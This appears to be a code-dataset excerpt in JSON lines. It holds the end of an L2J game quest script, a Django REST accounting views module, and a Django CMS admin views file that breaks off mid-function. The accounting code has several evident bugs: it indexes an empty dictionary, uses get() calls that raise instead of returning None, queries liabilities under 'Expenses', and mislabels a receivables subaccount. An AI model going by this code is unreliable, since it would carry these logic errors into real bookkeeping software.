if cond in [11,12] :\n htmltext = \"31531-01.htm\"\n elif cond == 13 :\n htmltext = \"31531-03.htm\"\n elif npcId == Coffin:\n if cond == 12 :\n htmltext = \"31536-01.htm\"\n st.giveItems(Dress,1)\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"13\")\n npc.deleteMe()\n return htmltext\n\n def onKill(self,npc,player,isPet):\n st = player.getQuestState(qn)\n if not st : return\n if st.getState() != State.STARTED : return\n if st.getInt(\"cond\") == 7:\n st.playSound(\"ItemSound.quest_itemget\")\n st.set(\"cond\",\"8\")\n npc.broadcastPacket(NpcSay(npc.getObjectId(), 0, npc.getNpcId(), \"You've ended my immortal life! You've protected by the feudal lord, aren't you?\"))\n st.giveItems(TotemDoll,1)\n st.set(\"step\",\"2\")\n return\n\nQUEST = Quest(25,qn,\"Hiding Behind The Truth\")\n\nQUEST.addStartNpc(Benedict)\nQUEST.addTalkId(Agripel)\nQUEST.addTalkId(Benedict)\nQUEST.addTalkId(Bookshelf)\nQUEST.addTalkId(Bookshelf2)\nQUEST.addTalkId(Bookshelf3)\nQUEST.addTalkId(Wizard)\nQUEST.addTalkId(Lidia)\nQUEST.addTalkId(Tombstone)\nQUEST.addTalkId(Coffin)\nQUEST.addKillId(Triol)","repo_name":"L2jBrasil/L2jBrasil","sub_path":"L2JBrasil_DP/data/jscript/quests/25_HidingBehindTheTruth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9514,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"26378009513","text":"from django.shortcuts import render, get_object_or_404\nfrom django.utils import timezone\nfrom django.http import JsonResponse\nfrom django.db.models.expressions import RawSQL\nfrom django.db.models import Count, Sum, Q\nfrom django.db import transaction\n\nfrom rest_framework import generics, status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\n\nfrom .models import (\n AccountState, AccountingSettings, AccountsJournals, FiscalYear, AccountType,\n SubAccount, IncreaseState, DraftBudgetPlan, BudgetPlan)\nfrom .serializers import (\n FiscalYearSerializer, DraftBudgetPlanSerializer, SubAccountSerializer, AccounTypeSerializer,\n AccountingSettingsSerializer, AccountsJournalsSerializers,\n DraftBudgetPlan, BudgetPlanSerializer)\n\n\nclass FiscalYearCreateListView(APIView):\n def get(self, request, id=None):\n if id:\n fiscal_year = get_object_or_404(FiscalYear, id=id)\n serializer = FiscalYearSerializer(fiscal_year)\n\n return Response(\n serializer.data)\n else:\n fiscal_years = FiscalYear.objects.all()\n serializer = FiscalYearSerializer(fiscal_years, many=True)\n\n return Response(serializer.data)\n\n def post(self, request):\n data = request.data\n\n serializer = FiscalYearSerializer(data=data)\n\n open_fiscal_year = FiscalYear.objects.filter(\n state=AccountState.choices[0][0]).first()\n\n if open_fiscal_year:\n return Response(\n data=\"Cannot create new fiscal year when there is an existing open fiscal year\",\n status=status.HTTP_400_BAD_REQUEST)\n\n elif serializer.is_valid():\n serializer.save()\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED)\n\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass CurrentFiscalYearView(APIView):\n def get(self, request):\n current_fiscal_year = FiscalYear.objects.filter(\n state=AccountState.choices[0][0]).all()\n\n if len(current_fiscal_year) == 1:\n serializer = FiscalYearSerializer(current_fiscal_year[0])\n\n return Response(serializer.data)\n elif len(current_fiscal_year) > 1:\n return Response(\n data=\"System error, Please contact the administrator\",\n status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response(\n data=\"Current Fiscal year not set\",\n status=status.HTTP_404_NOT_FOUND)\n\n\nclass StartupAccountsView(APIView):\n def post(self, request):\n \"\"\"\n data structure \\n\n {\n selling_products: {\n value: True,\n cash_sales: {\n value: True\n },\n credit_sales: {\n value: True\n },\n check_sales: {\n value: True\n },\n other_cash_accounts: {\n value: [\n {\n name: '',\n additional_data: ''\n }\n ]\n }\n },\n making_payments: {\n value: True,\n cash_payments: {\n value: True\n },\n credit_payments: {\n value: True\n },\n check_payments: {\n value: True\n },\n other_cash_accounts: {\n value: [\n {\n name: '',\n additional_data: {}\n }\n ]\n }\n },\n\n } \n \"\"\"\n accounts = {}\n # default revenue account\n\n current_fiscal_year = FiscalYear.objects.get(\n state=AccountState.choices[0][0])\n\n revenue_account_type = AccountType.objects.get(\n name__startswith=\"Revenue\",\n state=AccountState.choices[0][0])\n asset_account_type = AccountType.objects.get(\n name__startswith=\"Assets\",\n state=AccountState.choices[0][0])\n expense_account_type = AccountType.objects.get(\n name__startswith=\"Expenses\",\n state=AccountState.choices[0][0])\n liabilities_account_type = AccountType.objects.get(\n name__startswith=\"Expenses\",\n state=AccountState.choices[0][0])\n\n revenue_subaccount = SubAccount.objects.get(\n name__startswith=\"Revenue\",\n state=AccountState.choices[0][0])\n\n if not revenue_account_type:\n revenue_account_type = AccountType.objects.create(\n name=\"Revenue\",\n increase=IncreaseState.choices[1][0])\n current_fiscal_year.account_types.add(revenue_account_type)\n current_fiscal_year.save()\n\n if not revenue_subaccount:\n revenue_subaccount = SubAccount(name=\"Revenue Account\")\n revenue_subaccount.account_type.add(revenue_account_type)\n revenue_subaccount.save()\n\n selling_products = accounts[\"selling_products\"]\n if selling_products.value:\n if not asset_account_type:\n asset_account_type = AccountType.objects.create(\n name=\"Assets\",\n increase=IncreaseState.choices[0][0])\n current_fiscal_year.account_types.add(asset_account_type)\n current_fiscal_year.save()\n asset_account_type.save()\n\n if not expense_account_type:\n expense_account_type = AccountType.objects.create(\n name=\"Expenses\",\n increase=IncreaseState.choices[0][0])\n current_fiscal_year.account_types.add(expense_account_type)\n current_fiscal_year.save()\n expense_account_type.save()\n\n product_sales_subaccount = SubAccount.objects.get(\n name__startswith=\"Product Sales\",\n state=AccountState.choices[0][0])\n if not product_sales_subaccount:\n product_sales_subaccount = SubAccount(\n name=\"Product Sales Account\")\n product_sales_subaccount.account_type.add(revenue_account_type)\n product_sales_subaccount.save()\n\n inventory_subaccount = SubAccount.objects.get(\n name__startswith=\"Inventory\",\n state=AccountState.choices[0][0])\n if not inventory_subaccount:\n inventory_subaccount = SubAccount(name=\"Inventory Account\")\n inventory_subaccount.account_type.add(asset_account_type)\n inventory_subaccount.save()\n\n cogs_subaccount = SubAccount.objects.get(\n name__startswith=\"Cost of Goods Sold\",\n state=AccountState.choices[0][0])\n if not cogs_subaccount:\n cogs_subaccount = SubAccount(name=\"Cost of Goods Sold Account\")\n cogs_subaccount.account_type.add(expense_account_type)\n cogs_subaccount.save()\n\n if selling_products.cash_sales.value:\n cash_subaccount = SubAccount.objects.get(\n name__startswith=\"Cash\",\n state=AccountState.choices[0][0])\n if not cash_subaccount:\n cash_subaccount = SubAccount(name=\"Cash Account\")\n cash_subaccount.account_type.add(asset_account_type)\n cash_subaccount.save()\n\n if selling_products.credit_sales.value:\n credit_sales_subaccount = SubAccount.objects.get(\n name__startswith=\"Accounts Receivable\",\n state=AccountState.choices[0][0])\n if not credit_sales_subaccount:\n credit_sales_subaccount = SubAccount(\n name=\"Inventory Account\")\n credit_sales_subaccount.account_type.add(\n asset_account_type)\n credit_sales_subaccount.save()\n\n if selling_products.check_sales.value:\n check_subaccount = SubAccount.objects.get(\n name__startswith=\"Checking Account\",\n state=AccountState.choices[0][0])\n if not check_subaccount:\n check_subaccount = SubAccount(name=\"Checking Account\")\n check_subaccount.account_type.add(asset_account_type)\n check_subaccount.save()\n\n if selling_products.other_cash_accounts.value:\n for account in selling_products.other_cash_accounts.value:\n cash_m_subaccount = SubAccount.objects.get(\n name__startswith=account.name,\n state=AccountState.choices[0][0])\n if not cash_m_subaccount:\n cash_m_subaccount = SubAccount(\n name=account.name.capitalize(),\n additional_data=account.additional_data)\n cash_m_subaccount.account_type.add(asset_account_type)\n cash_m_subaccount.save()\n\n making_payments = accounts[\"making_payments\"]\n if making_payments.value:\n if not asset_account_type:\n asset_account_type = AccountType.objects.create(\n name=\"Assets\",\n increase=IncreaseState.choices[0][0])\n current_fiscal_year.account_types.add(asset_account_type)\n current_fiscal_year.save()\n asset_account_type.save()\n\n if making_payments.credit_payments.value:\n if not liabilities_account_type:\n liabilities_account_type = AccountType.objects.create(\n name=\"Liabilities\",\n increase=IncreaseState.choices[1][0])\n current_fiscal_year.account_types.add(\n liabilities_account_type)\n current_fiscal_year.save()\n liabilities_account_type.save()\n credit_payments_subaccount = SubAccount.objects.get(\n name__startswith=\"Accounts Payable\",\n state=AccountState.choices[0][0])\n if not credit_payments_subaccount:\n credit_payments_subaccount = SubAccount(\n name=\"Accounts Payable\")\n credit_payments_subaccount.account_type.add(\n liabilities_account_type)\n credit_payments_subaccount.save()\n\n if making_payments.cash_payments.value:\n cash_subaccount = SubAccount.objects.get(\n name__startswith=\"Cash\",\n state=AccountState.choices[0][0])\n if not cash_subaccount:\n cash_subaccount = SubAccount(name=\"Cash Account\")\n cash_subaccount.account_type.add(asset_account_type)\n cash_subaccount.save()\n\n if making_payments.check_payments.value:\n check_subaccount = SubAccount.objects.get(\n name__startswith=\"Checking Account\",\n state=AccountState.choices[0][0])\n if not check_subaccount:\n check_subaccount = SubAccount(name=\"Checking Account\")\n check_subaccount.account_type.add(asset_account_type)\n check_subaccount.save()\n\n if making_payments.other_cash_accounts.value:\n for account in selling_products.other_cash_accounts.value:\n payment_m_subaccount = SubAccount.objects.get(\n name__startswith=account.name,\n state=AccountState.choices[0][0])\n if not payment_m_subaccount:\n payment_m_subaccount = SubAccount(\n name=account.name.capitalize(),\n additional_data=account.additional_data)\n payment_m_subaccount.account_type.add(\n asset_account_type)\n payment_m_subaccount.save()\n\n return\n\n\nclass SubAccountsByIdsListView(APIView):\n def post(self, request):\n data = request.data\n\n accounts_ids = data.get(\"accounts_ids\")\n\n accounts = []\n\n for id in accounts_ids:\n accounts.append(SubAccount.objects.get(id=id))\n\n serializer = SubAccountSerializer(accounts, many=True)\n\n return Response(serializer.data)\n\n\nclass SubAccountsListCreateView(APIView):\n def get(self, request):\n data = request.query_params\n id = data.get(\"id\")\n name = data.get(\"name\")\n\n if id:\n sub_account = get_object_or_404(SubAccount, id=id)\n\n serializer = SubAccountSerializer(sub_account)\n\n elif name:\n sub_account = get_object_or_404(\n SubAccount, name__contains=name, state=AccountState.choices[0][0])\n\n serializer = SubAccountSerializer(sub_account)\n else:\n sub_accounts = SubAccount.objects.filter(\n state=AccountState.choices[0][0]).all()\n\n serializer = SubAccountSerializer(sub_accounts, many=True)\n\n return Response(serializer.data)\n\n def post(self, request, id):\n data = request.data\n\n sub_account = data.get(\"sub_account\")\n\n sub_accounts = data.get(\"sub_accounts\")\n\n account_type = get_object_or_404(AccountType, id=id)\n\n if sub_accounts:\n for sub_account__ in sub_accounts:\n serializer = SubAccountSerializer(data=sub_account__)\n\n if serializer.is_valid():\n sub_account = SubAccount.objects.create(**serializer.data)\n sub_account.account_type.add(account_type)\n sub_account.save()\n\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n return Response(\n data=\"New accounts have been created successfully\",\n status=status.HTTP_201_CREATED)\n\n elif sub_account:\n serializer = SubAccountSerializer(data=sub_account)\n\n if serializer.is_valid():\n sub_account = SubAccount.objects.create(**serializer.data)\n sub_account.account_type.add(account_type)\n sub_account.save()\n serializer = SubAccountSerializer(sub_account)\n\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED)\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response(\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass AccountTypesListCreateView(APIView):\n def get(self, request, id=None):\n if id:\n account_type = AccountType.objects.get(id=id)\n\n serializer = AccounTypeSerializer(account_type)\n\n else:\n account_types = AccountType.objects.filter(\n state=AccountState.choices[0][0]).all()\n\n serializer = AccounTypeSerializer(account_types, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n data = request.data\n\n serializer = AccounTypeSerializer(data=data)\n\n if serializer.is_valid():\n account_type = serializer.save()\n\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED)\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass AccountingSettingsRetrieveCreateView(APIView):\n def get(self, request, item=None):\n if item:\n settings = get_object_or_404(AccountingSettings, item=item)\n\n serializer = AccountingSettingsSerializer(settings)\n else:\n settings = AccountingSettings.objects.all()\n serializer = AccountingSettingsSerializer(settings, many=True)\n\n return Response(data=serializer.data)\n\n def post(self, request):\n data = request.data[\"data\"]\n\n serializer = AccountingSettingsSerializer(data=data, many=True)\n if serializer.is_valid():\n for setting in serializer.data:\n existing_setting = AccountingSettings.objects.filter(\n item=setting[\"item\"]).first()\n if existing_setting:\n existing_setting.additional_data = setting[\"additional_data\"]\n existing_setting.save()\n else:\n new_setting = AccountingSettings.objects.create(\n item=setting[\"item\"])\n new_setting.additional_data = setting[\"additional_data\"]\n new_setting.save()\n\n serializer = AccountingSettingsSerializer(\n AccountingSettings.objects.all(), many=True)\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED)\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass AccountsJounrnalsCreateListView(APIView):\n def get(self, request, id=None, entry_type=None):\n if id and entry_type:\n\n journal_entries = AccountsJournals.objects.filter(\n sub_account__id=id,\n entry_type=entry_type).all()\n\n serializer = AccountsJournalsSerializers(\n journal_entries, many=True)\n data = serializer.data\n\n elif id:\n sub_account = get_object_or_404(\n SubAccount,\n id=id)\n\n journal_entries = sub_account.accountsjournals_set.all()\n\n serializer = AccountsJournalsSerializers(\n journal_entries, many=True)\n data = serializer.data\n else:\n subaccounts = SubAccount.objects.filter(\n state=AccountState.choices[0][0]).all()\n data = []\n for subaccount in subaccounts:\n data.append(\n {\n \"account\": SubAccountSerializer(subaccount).data,\n \"journals\": AccountsJournalsSerializers(\n subaccount.accountsjournals_set.all(),\n many=True).data})\n\n return Response(data)\n\n @transaction.atomic(durable=True)\n def post(self, request, id):\n data = request.data\n\n subaccount = get_object_or_404(SubAccount, id=id)\n\n serializer = AccountsJournalsSerializers(data=data)\n\n if serializer.is_valid():\n if subaccount.account_type.all()[0].increase == data[\"entry_type\"]:\n amount = data[\"amount\"]\n else:\n amount = 0 - data[\"amount\"]\n \n new_entry = AccountsJournals.objects.create(\n date=data[\"date\"],\n amount=amount,\n item_id=data[\"budgetitem\"],\n entry_type=data[\"entry_type\"],\n additional_data=data[\"additional_data\"])\n\n new_entry.sub_account.add(subaccount)\n\n budget_settings = AccountingSettings.objects.get(\n item=\"ITEMS_SPECIFICATION\")\n if budget_settings.additional_data and \\\n budget_settings.additional_data[\"use_budget_plan\"] and \\\n budget_settings.additional_data[\"use_budget_plan\"][\"value\"]:\n\n budget_item = get_object_or_404(\n BudgetPlan, id=data[\"budgetitem\"])\n\n budget_subaccount = get_object_or_404(\n SubAccount,\n name=\"Budget_Item_%s_%s\" % (budget_item.identifier, budget_item.name))\n\n \n new_entry2 = AccountsJournals.objects.create(\n amount=amount,\n item_id=data[\"budgetitem\"],\n entry_type=budget_subaccount.account_type.all()[0].increase)\n\n new_entry2.sub_account.add(budget_subaccount)\n\n new_entry2.save()\n\n new_entry.save()\n\n return Response(\n data=\"Added entry successfully.\",\n status=status.HTTP_201_CREATED)\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass BudgetPlanItemView(APIView):\n def get(self, request, id):\n budget_item = get_object_or_404(BudgetPlan, id=id)\n\n serializer = BudgetPlanSerializer(budget_item)\n\n return Response(serializer.data)\n\nclass BudgetPlanCreateListView(APIView):\n def get(self, request, id=None, collection=\"list\"):\n \"\"\"Returns budget plan using fiscal year id\n\n Args:\n request : Request information\n id (Int, optional): id for fiscal year to return fiscal year budget. Defaults to None.\n\n Returns:\n Response: Returns budget plan if id is specified or all budget plans list.\n \"\"\"\n data = None\n if id:\n if collection == \"list\":\n fiscal_year = get_object_or_404(FiscalYear, id=id)\n\n budget_plan = fiscal_year.budgetplan_set.all()\n\n serializer = BudgetPlanSerializer(budget_plan, many=True)\n\n data = serializer.data\n elif collection == \"category\":\n categories = BudgetPlan.objects.filter(fiscalYear__id=id).values(\n \"category\").annotate(Count(\"category\")).all()\n data = []\n for item in categories:\n category = item[\"category\"]\n data.append(\n {\n \"category\": category,\n \"items\": BudgetPlanSerializer(\n BudgetPlan.objects.filter(\n category=category).all(),\n many=True).data})\n else:\n budget_plans = BudgetPlan.objects.all()\n\n serializer = BudgetPlanSerializer(budget_plans, many=True)\n data = serializer.data\n\n return Response(data)\n\n @transaction.atomic(durable=True)\n def post(self, request, id):\n data = request.data\n fiscal_year = get_object_or_404(FiscalYear, id=id)\n\n item = data.get(\"item\")\n items = data.get(\"items\")\n\n if item:\n serializer = BudgetPlanSerializer(data=item)\n if serializer.is_valid():\n new_budget_item = BudgetPlan.objects.create(**item)\n new_budget_item.fiscalYear.add(fiscal_year)\n # new_budget_item.save()\n\n account_type = AccountType.objects.filter(\n name__contains=item[\"category\"]).first()\n\n if not account_type:\n return Response(\n data=\"Failed to set account.\",\n status=status.HTTP_400_BAD_REQUEST)\n\n new_sub_account = SubAccount.objects.create(\n name=\"Budget_Item_%s_%s\" % (\n new_budget_item.identifier,\n new_budget_item.name),\n opening_balance=0)\n new_sub_account.account_type.add(account_type)\n # new_sub_account.save()\n\n new_budget_item.save()\n\n new_sub_account.save()\n\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED)\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n elif items:\n serializer = BudgetPlanSerializer(data=items, many=True)\n if serializer.is_valid():\n for item in items:\n new_budget_item = BudgetPlan.objects.create(**item)\n new_budget_item.fiscalYear.add(fiscal_year)\n # new_budget_item.save()\n\n account_type = AccountType.objects.filter(\n name__contains=item[\"category\"]).first()\n\n if not account_type:\n return Response(\n data=\"Failed to set account.\",\n status=status.HTTP_400_BAD_REQUEST)\n\n new_sub_account = SubAccount.objects.create(\n name=\"Budget_Item_%s_%s\" % (\n new_budget_item.identifier,\n new_budget_item.name),\n opening_balance=0)\n new_sub_account.account_type.add(account_type)\n # new_sub_account.save()\n\n new_budget_item.save()\n\n new_sub_account.save()\n\n return Response(\n data=\"New budget item created succesfully\",\n status=status.HTTP_201_CREATED)\n else:\n # rollback()\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass BudgetPlanByCategoryListView(APIView):\n def get(self, request, id, category):\n items = BudgetPlan.objects.filter(\n fiscalYear__id=id, category__contains=category).all()\n serializer = BudgetPlanSerializer(items, many=True)\n return Response(serializer.data)\n\n\nclass DraftBudgetPlanCreateRetrieveView(APIView):\n def get(self, request):\n budget_plan = DraftBudgetPlan.objects.all()\n\n categories = DraftBudgetPlan.objects.values(\n \"category\").annotate(Count(\"category\")).all()\n data = []\n for item in categories:\n category = item[\"category\"]\n data.append(\n {\n \"category\": category,\n \"items\": DraftBudgetPlanSerializer(\n DraftBudgetPlan.objects.filter(\n category=category).all(),\n many=True).data})\n\n return Response(data)\n\n def post(self, request):\n data = request.data\n\n # existing_budget_plan = DraftBudgetPlan.objects.first()\n # if existing_budget_plan:\n # return Response(\n # data=\"Cannot create new budget\",\n # status=status.HTTP_400_BAD_REQUEST)\n\n serializer = DraftBudgetPlanSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED)\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n def put(self, request, id):\n data = request.data\n\n serializer = DraftBudgetPlanSerializer(data=data)\n\n if serializer.is_valid():\n DraftBudgetPlan.objects.filter(id=id)\\\n .update(**serializer.data)\n return Response(\n data=serializer.data,\n status=status.HTTP_200_OK)\n else:\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass FinancialDocumentsView(APIView):\n def get(self, request, document):\n if document == \"TRIAL_BALANCE\":\n data = SubAccount.objects.annotate(\n balance= Sum(\"accountsjournals__amount\"))\\\n .values(\n \"name\", \n \"balance\", \n account_type=\"account_type__name\")\n\n return Response(data)\n\n if document == \"INCOME_STATEMENT\":\n # net income = (Revenue + Gains) - (Expenses + Losses)\n data = SubAccount.objects.annotate(\n balance= Sum(\"accountsjournals__amount\"))\\\n .values(\n \"name\", \n \"balance\", \n account_type=\"account_type__name\")\\\n .filter(account_type__name__contains=[\"Revenue\", \"Expense\"])\n \n return Response(data)\n","repo_name":"samuelitwaru/wex-erp","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16029813607","text":"import math\nfrom datetime import datetime,date\nfrom django.shortcuts import render\nfrom cmsadmain.models import *\nfrom django.http import HttpResponse\nfrom common import returnResult\nfrom django.forms import forms\nfrom DjangoUeditor.forms import UEditorField\nfrom django.template.defaultfilters import striptags\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nimport json\n# Create your views here.\nclass TestUEditorForm(forms.Form):\n content = UEditorField('内容', width=700, height=400, toolbars=\"full\", imagePath=\"static/images/\", filePath=\"static/files/\", upload_settings={\"imageMaxSize\":1204000},settings={})\n\n######################主页\ndef home(request):\n #获取文章最大阅读数量\n list = news.objects.values(\"num\").order_by('-num')\n #文章数\n count = list.count()\n #今日登录用户\n todayuser = admain.objects.filter(lasttime=date.today()).count()\n #推荐位数\n positioncount = position.objects.all().count()\n print(list[0][\"num\"],count,todayuser)\n context = {\"newscount\":count,\"maxread\":list[0][\"num\"],\"todayuser\":todayuser,\"positioncount\":positioncount}\n return render(request,\"../templates/cmsadmain/home.html\",context)\n\ndef admainheader(request):\n del request.session['user']\n return HttpResponse(returnResult.returnResult(0, \"已退出,欢迎下次登录!\"))\ndef admainheaderHandler(request):\n # 获取session当前登录用户\n user = request.session[\"user\"]\n print(user)\n return HttpResponse(user)\n\n######################菜单管理\ndef menus(request):\n context = {}\n return render(request,\"../templates/cmsadmain/menu.html\",context)\n\ndef menusHandler(request):\n list = menu.objects.values(\"id\",\"menuname\",\"menutype\",\"menustate\")\n menulist = []\n if list.count()>0:\n for item in list:\n menulist.append(item)\n rs = json.dumps(menulist)\n return HttpResponse(rs)\n return HttpResponse(0)\n\n#添加菜单\ndef addmenu(request):\n context = {}\n return render(request,\"../templates/cmsadmain/addmenu.html\",context)\n\ndef addmenuHandler(request):\n if request.method == \"POST\":\n # 获取前端发送的数据\n name = request.POST.get(\"menuname\")\n type = request.POST.get(\"menutype\")\n state = request.POST.get(\"menustate\")\n print(name, type, state)\n #获取数据库判断添加的数据是否存在\n list = menu.objects.values(\"menuname\",\"menutype\").filter(menuname=name)\n for item in list:\n if item[\"menuname\"] == name and item[\"menutype\"] == type:\n rs = returnResult.returnResult(1, \"该栏目已存在!\")\n return HttpResponse(rs)\n\n #将数据存储到数据库\n obj = menu(menuname=name,menustate=state,menutype=type)\n obj.save()\n #向前端返回数据\n rs = returnResult.returnResult(0,\"添加成功!\")\n return HttpResponse(rs)\n\n#编辑菜单\ndef updatemenu(request):\n if request.method == \"POST\":\n id = request.POST.get(\"id\")\n list = menu.objects.values(\"menuname\",\"menutype\",\"menustate\").filter(id=id)\n dic = {}\n for item in list:\n dic = {\"menuname\":item[\"menuname\"],\"menutype\":item[\"menutype\"],\"menustate\":item[\"menustate\"]}\n str = json.dumps(dic)\n return HttpResponse(str)\n context = {}\n return render(request,\"../templates/cmsadmain/updatemenu.html\",context)\n\ndef updatemenuHandler(request):\n if request.method == \"POST\":\n # 获取前端发送的数据\n id = request.POST.get(\"menuid\")\n name = request.POST.get(\"menuname\")\n type = request.POST.get(\"menutype\")\n state = request.POST.get(\"menustate\")\n print(id,name, type, state)\n # 获取数据库判断添加的数据是否存在\n list = menu.objects.values(\"menuname\", \"menutype\",\"menustate\").filter(menuname=name)\n for item in list:\n if item[\"menuname\"] == name and item[\"menutype\"] == type and item[\"menustate\"] == state:\n rs = returnResult.returnResult(1, \"该栏目已存在!\")\n return HttpResponse(rs)\n\n # 将数据修改后存储到数据库\n menu.objects.filter(id = id).update(menuname=name,menutype=type,menustate=state)\n # 向前端返回数据\n rs = returnResult.returnResult(0, \"修改成功!\")\n return HttpResponse(rs)\n\n#删除菜单\ndef delmenu(request):\n id = request.POST.get(\"id\")\n print(id)\n menu.objects.filter(id = id).delete()\n return HttpResponse(0)\n\n\n######################文章管理页面\ndef article(request):\n #查询新闻表和菜单表\n newslist = news.objects.values(\"id\",\"catid\",\"title\",\"titlt_font_color\",\"thumb\",\"num\")\n menulist = menu.objects.values(\"id\",\"menuname\")\n positionlist = position.objects.values(\"id\",\"name\")\n dic = {}\n list = []\n dic2 = {}\n list2 = []\n #通过比较id得到新闻的所属栏目名\n for item in newslist:\n for item2 in menulist:\n if item[\"catid\"] == item2[\"id\"]:\n dic = {\"id\":item[\"id\"],\"title\":item[\"title\"],\"menu\":item2[\"menuname\"],\"thumb\":item[\"thumb\"],\"num\":item[\"num\"]}\n list.append(dic)\n #获取推送栏目的列表\n for item in positionlist:\n dic2 = {\"id\":item[\"id\"],\"name\":item[\"name\"]}\n list2.append(dic2)\n context = {\"news\":list,\"position\":list2}\n return render(request,\"../templates/cmsadmain/article.html\",context)\n\ndef articleHandler(request):\n return HttpResponse(0)\n\n#添加文章\ndef addarticle(request):\n list = menu.objects.values(\"menuname\",\"id\").filter(menutype=\"前台栏目\")\n menudic = {}\n menulist = []\n for item in list:\n menudic = {\"id\":item[\"id\"],\"menuname\":item[\"menuname\"]}\n menulist.append(menudic)\n form = TestUEditorForm()\n return render(request,\"../templates/cmsadmain/addarticle.html\",{\"form\":form,\"list\":menulist})\n\ndef addarticleHandler(request):\n title = request.POST.get(\"title\")\n titlecolor = request.POST.get(\"color\")\n newsmenu = request.POST.get(\"menu\")\n newsimg = request.FILES.get(\"newsimg\")\n content = striptags(request.POST.get(\"content\"))\n print(title, titlecolor, newsmenu, newsimg, content)\n #缩略图不存在\n if newsimg == None:\n #如果标题不存在\n if titlecolor == None:\n obj = news(catid=newsmenu,title=title,num=0,time=datetime.now())\n obj.save()\n else:\n obj = news(catid=newsmenu, title=title,num=0,titlt_font_color=titlecolor, time=datetime.now())\n obj.save()\n #获取刚存进去的新闻id\n list = news.objects.values(\"id\").filter(title=title).order_by('-id')\n #把文章内容存到数据库中\n obj2 = news_content(newsid=list[0][\"id\"],content=content)\n obj2.save()\n return HttpResponse(returnResult.returnResult(0,\"添加成功!\"))\n #缩略图存在\n if newsimg != None:\n # 判断上传过来的文件类型是否是项目需要的\n if newsimg.name.split(\".\")[-1] not in [\"jpg\", \"jpeg\", \"png\"]:\n return HttpResponse(returnResult.returnResult(1, \"添加失败,文件类型不正确\"))\n # 判断文件是否过大\n size = getsize(newsimg.size)\n print(size)\n if float(size) > 100:\n return HttpResponse(returnResult.returnResult(2, \"添加失败,文件过大!\"))\n\n # 创建文件名 以及指定到保存文件的路径\n filename = \"newsImg_\" + str(int(datetime.now().timestamp() * 1000000)) + \".\" + newsimg.name.split(\".\")[-1]\n savePath = \"static/newsimg/\" + filename\n # 写入文件中\n with open(savePath, 'wb') as f:\n for file in newsimg.chunks():\n f.write(file)\n f.flush()\n # 存入数据库中\n #如果标题颜色不存在\n if titlecolor == None:\n obj = news(catid=newsmenu, title=title,num=0,thumb=filename, time=datetime.now())\n obj.save()\n else:\n obj = news(catid=newsmenu, title=title,num=0,titlt_font_color=titlecolor,thumb=filename, time=datetime.now())\n obj.save()\n # 获取刚存进去的新闻id\n list = news.objects.values(\"id\").filter(title=title).order_by('-id')\n # 把文章内容存到数据库中\n obj2 = news_content(newsid=list[0][\"id\"], content=content)\n obj2.save()\n return HttpResponse(returnResult.returnResult(0, \"添加成功!\"))\n\n#编辑文章\ndef updatearticle(request):\n #获取前端传过来的id\n newsid = request.GET.get(\"id\")\n #查询数据库\n newlist = news.objects.values(\"title\",\"titlt_font_color\",\"catid\",\"thumb\").filter(id = newsid)\n content = news_content.objects.values(\"content\").filter(newsid = newsid)\n #数据处理\n contentstr = \"\"\n dic = {}\n list = []\n for item in content:\n contentstr = item[\"content\"]\n for item2 in newlist:\n list = menu.objects.values(\"menuname\",\"id\").filter(menutype=\"前台栏目\")\n for item3 in list:\n if item2[\"catid\"] == item3[\"id\"]:\n dic = {\"title\":item2[\"title\"],\"titlecolor\":item2[\"titlt_font_color\"],\"menu\":item3[\"menuname\"],\"catid\":item2[\"catid\"],\"thumb\":item2[\"thumb\"],\"content\":contentstr}\n form = TestUEditorForm()\n return render(request,\"../templates/cmsadmain/updatearticle.html\",{\"form\":form,\"news\":dic,\"menulist\":list})\n\ndef updatearticleHandler(request):\n newsid = request.POST.get(\"newsid\")\n title = request.POST.get(\"title\")\n titlecolor = request.POST.get(\"color\")\n newsmenu = request.POST.get(\"menu\")\n newsimg = request.FILES.get(\"newsimg\")\n newcontent = striptags(request.POST.get(\"content\"))\n print(newcontent,newsid)\n # 缩略图不存在\n if newsimg == None:\n # 如果标题颜色不存在\n if titlecolor == None:\n news.objects.filter(id = newsid).update(catid=newsmenu, title=title,time=datetime.now())\n else:\n news.objects.filter(id = newsid).update(catid=newsmenu, title=title, titlt_font_color=titlecolor, time=datetime.now())\n # 把修改的文章内容存到数据库中\n if newcontent != \" 100:\n return HttpResponse(returnResult.returnResult(2, \"修改失败,文件过大!\"))\n\n # 创建文件名 以及指定到保存文件的路径\n filename = \"newsImg_\" + str(int(datetime.now().timestamp() * 1000000)) + \".\" + newsimg.name.split(\".\")[-1]\n savePath = 